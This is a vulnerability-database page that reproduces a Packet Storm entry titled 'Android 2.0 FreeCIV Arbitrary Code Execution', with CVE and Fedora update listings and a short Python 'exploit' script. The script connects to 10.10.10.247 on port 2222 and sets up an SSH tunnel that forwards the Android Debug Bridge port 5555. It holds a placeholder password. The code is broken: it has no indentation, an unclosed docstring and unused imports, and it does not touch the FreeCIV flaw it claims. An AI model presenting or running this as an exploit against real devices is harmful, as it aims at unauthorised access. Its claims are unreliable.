Lucene search
K

Android 2.0 FreeCIV Arbitrary Code Execution

🗓️ 28 Jun 2021 00:00:00Reported by Raed AhsanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 1215 Views

Android 2.0 FreeCIV Arbitrary Code Execution via ADB exploi

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2010-2445
7 Jul 201018:00
cve
Cvelist
CVE-2010-2445
7 Jul 201018:00
cvelist
Debian CVE
CVE-2010-2445
7 Jul 201018:00
debiancve
EUVD
EUVD-2010-2454
7 Oct 202500:30
euvd
Fedora
[SECURITY] Fedora 14 Update: freeciv-2.2.2-1.fc14
19 Aug 201001:11
fedora
Fedora
[SECURITY] Fedora 12 Update: freeciv-2.2.2-1.fc12
20 Aug 201001:31
fedora
Fedora
[SECURITY] Fedora 13 Update: freeciv-2.2.2-1.fc13
20 Aug 201002:24
fedora
Tenable Nessus
Fedora 13 : freeciv-2.2.2-1.fc13 (2010-12256)
20 Aug 201000:00
nessus
Tenable Nessus
Fedora 12 : freeciv-2.2.2-1.fc12 (2010-12262)
20 Aug 201000:00
nessus
Tenable Nessus
Fedora 14 : freeciv-2.2.2-1.fc14 (2010-12371)
19 Aug 201000:00
nessus
Rows per page
`"""  
Android Debug Bridge (ADB) freeciv exploit  
Author : Raed-Ahsan  
https://linkedin.com/in/raed-ahsan  
Android 2.0 Banana Studio  
"""  
  
"""  
  
  
import socket # socket  
import subprocess # Subprocess  
import pyautogui # PyAutoGui  
import time # Time  
  
  
def connection_function(host, port):  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
print(s.recv(1024))  
  
connection_function("10.10.10.247", 2222)  
  
  
def adb_connection(host, port):  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
print(s.recv(1024))  
  
subprocess.call(['ssh -p 2222 -L 5555:localhost:5555 [email protected]'], shell=True)  
password = "[PASSWORD OF TARGET MACHINE OF SSH]"  
print(s.recv(1024))  
  
adb_connection("10.10.10.247", 2222)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Jun 2021 00:00Current
0.9Low risk
Vulners AI Score0.9
EPSS0.01199
1215